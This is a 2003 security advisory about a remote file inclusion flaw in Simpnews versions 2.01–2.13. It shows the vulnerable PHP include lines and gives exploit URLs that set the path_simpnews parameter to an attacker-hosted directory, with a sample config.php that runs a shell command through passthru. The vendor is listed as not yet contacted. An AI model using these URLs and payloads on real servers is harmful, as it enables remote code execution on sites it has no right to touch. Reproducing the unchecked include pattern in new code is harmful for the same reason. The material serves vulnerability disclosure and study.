original File name : PUPET-simpnews.txt

date releases      : july 15, 2003



Informations :

=========================

Advisory Name: Simpnews include file Vulnerability

Author: PUPET <pupet@cosmo.com>

Discover by: PUPET <pupet@cosmo.com>

Website vendor : http://www.boesch-it.de/

Versions : tested on V2.01  -> V2.13 

Problem : Include file





PHP Code/Location :

=========================



/eventscroller.php :

---------------------------

...

require_once($path_simpnews.'/config.php');

require_once($path_simpnews.'/functions.php');

if(!isset($category))

	$category=0;

if(!isset($lang) || !$lang)



...

--------------------------





/eventcal2.php :

---------------------------

...

if(!isset($lastvisitdate))

	$lastvisitdate=0;

require_once($path_simpnews.'/config.php');

require_once($path_simpnews.'/functions.php');

include_once($path_simpnews.'/includes/has_entries.inc');

...

---------------------------



Exploits :

===============

http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/

with

http://[attacker]/config.php

http://[attacker]/functions.php

http://[attacker]/includes/has_entries.inc

or 

http://[target]/eventscroller.php?path_simpnews=http://[attacker]/

with

http://[attacker]/config.php

http://[attacker]/functions.php



Example for config.php on http://[attacker]/

==================

<? passthru("uname -a"); ?> 



Vendor Response:

==============

Not contacted yet



Patch :

=============

will post soon at http://www.cracxer.or.id .



reference :

=============

http://www.pupet.net/cracxerfiles



==============



This bugs Discover by : PUPET members of cracxer.or.id sub-devision 

security focus (www.cracxer.or.id)

 

Thanks to :

============

kaka-joe , pak-tani, Bewok , AxAL , ^BuBuR^aYaM^ , Ernesto_che_guevarra , 

Babah, Idon 

Schatje , juventini , Headup , Quervo , kecap , notts , Kemo (candyman) 

and all crew #cracxer, #dhegleng, #minangcrew, #indocracker at @dalnet



By :

============

PUPET (no more mr nice guy)